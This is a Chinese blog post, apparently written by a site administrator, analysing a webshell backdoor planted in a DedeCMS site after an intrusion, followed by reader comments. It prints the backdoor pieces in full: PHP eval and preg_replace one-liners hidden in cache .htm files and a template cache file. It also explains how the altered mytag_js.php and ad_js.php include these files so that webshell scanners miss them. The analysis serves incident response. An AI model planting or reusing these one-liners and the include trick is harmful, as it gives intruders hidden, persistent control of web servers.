首页 > 渗透测试 > dedecms之无节操webshell后门
2013
06-27

dedecms之无节操webshell后门

单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun.

为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢?

无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:

{dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);{/dede:php}

但是翻遍所有的Web目录也没有找到90sec.php文件,有朋友指点说可能是其它文件include这个文件。然后又用Seay的代码审计工具定义关键字各种扫,还是没找到。

最后老大翻到data/cache目录下发现了几个htm文件,myad-1.htm,myad-16.htm,mytag-1208.htm等,打开这些html文件,代码分别如下:

<!–

document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”);
–>

 

<!–

document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);

–>

 

<!–
document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST[‘guige’],’error’);?>”);
–>

看到这几个文件很奇怪,不知道黑阔要干嘛??虽然代码看似很熟悉,但是HTML文件能当后门用么?想起之前朋友说的include,然后结合前段时间的getshell漏洞利用细节,最终翻到plus/mytag_js.php文件,在这个文件里终于发现黑阔无节操的地方,主要代码如下:

dedecms之无节操webshell后门 - 第1张  | 阿德马Web安全

看到上面的代码我们应该知道黑阔是多么的邪恶,在生成的htm格式的cache文件中写入各种类型的一句话代码,然后再修改plus/ad_js.php和mytag_js.php文件,包含htm格式的cache文件。这样黑阔只需要在菜刀中填入以下URL就可以连接一句话了.

http://www.nxadmin.com/plus/mytag_js.php?id=1208

http://www.nxadmin.com/plus/ad_js.php?id=1

具体的id以及文件名跟data/cache目录下的myad-1.htm,mytag-1208.htm是有关系的。因此各种webshell扫描器都没有扫到webshell后门文件,因为很多默认都不对htm进行扫描.

不怎么懂php,所以分析可能有差错的地方,欢迎指正!最近中耳炎搞的我听力下降厉害,老大给我讲的一些我也没怎么听清楚,压力好大!下周去做手术!!!

 

 

最后编辑:
作者:admin
这个作者貌似有点懒,什么都没有留下。

dedecms之无节操webshell后门》有 8 条评论

  1. Quu 说:

    最近清理的时候,确实也看到了这样的情况了,只是清理了,就撸过了。

  2. hehe 说:

    仁兄。你还忘了 说明一件事, 他们的这个代码是放在 #@__myad #@__mytag 这两个表里面!!!!

  3. admin 说:

    仁兄,感谢指点!

  4. Helen 说:

    …….so

  5. 啦啦啦 说:

    好想法啊

  6. admin 说:

    谁有漏洞利用程序 求

  7. 哎呀哎呀 说:

    这个把我害惨了。这个把网站黑了,主页全部改了,百度收录从2万到了5万,收录的全是垃圾页面。百度权重从4降到0

留下一个回复

你的email不会被公开。